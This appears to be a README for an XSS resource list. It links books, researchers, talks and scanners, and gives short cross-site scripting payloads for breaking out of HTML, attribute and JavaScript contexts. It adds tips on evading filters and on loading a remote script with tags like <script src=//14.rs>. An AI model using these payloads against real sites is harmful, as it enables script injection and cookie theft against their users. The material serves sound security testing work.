AwesomeXSS

Awesome XSS stuff. Put this repo on watch. I will be updating it regularly.

Awesome Books

• XSS Cheat Sheet By Brute Logic

Awesome Websites

• brutelogic.com.br
• respectxss.blogspot.in

Awesome People

• Rodolfo Assis
• Ashar Javed
• Somdev Sangwan I own this repo, I can write whatever the fuck I want :v

Awesome Reads

• XSS in Sarahah

Awesome Presentations

• How I met your girlfriend
• How to Find 1,352 Wordpress XSS Plugin Vulnerabilities in one hour
• Blind XSS
• Copy Pest

Awesome Context Breaking

Simple Context

<svg onload=alert()>
</tag><svg onload=alert()>

Attribute Context

"><svg onload=alert()>
"><svg onload=alert()><b attr="
" onmouseover=alert() "
"onmouseover=alert()//

JavaScript Context

'-alert()-'
'-alert()//'
'}alert(1);{'
'}%0Aalert(1);%0A{'
</script><svg onload=alert()>

Awesome Payloads

Come back later

Awesome Exploits

Come back later

Awesome Tags & Event Handlers

Come back later

Awesome Methodology

Come back later

Awesome Tools

• XSStrike
• KNOXSS

Awesome Tips & Tricks

• http:// can be shortened to //
• document.cookie can be shortened to cookie. It applies to other DOM objects as well.
• alert and other pop-up functions don't need a value, so stop doing alert(1) and start doing alert()
• I have found that confirm is the least detected pop-up function so stop using alert.
• Quotes around attribute value aren't neccessary. You can use <script src=//14.rs> instead of <script src="//14.rs"&glt;
• The shortest independent payload is <embed src=//14.rs> (19 chars)

Credits and all that

All the payloads are crafted by me unless specified. Thanks to my big brother Rodolfo Assis whose writings inspired me to become an XSSLord.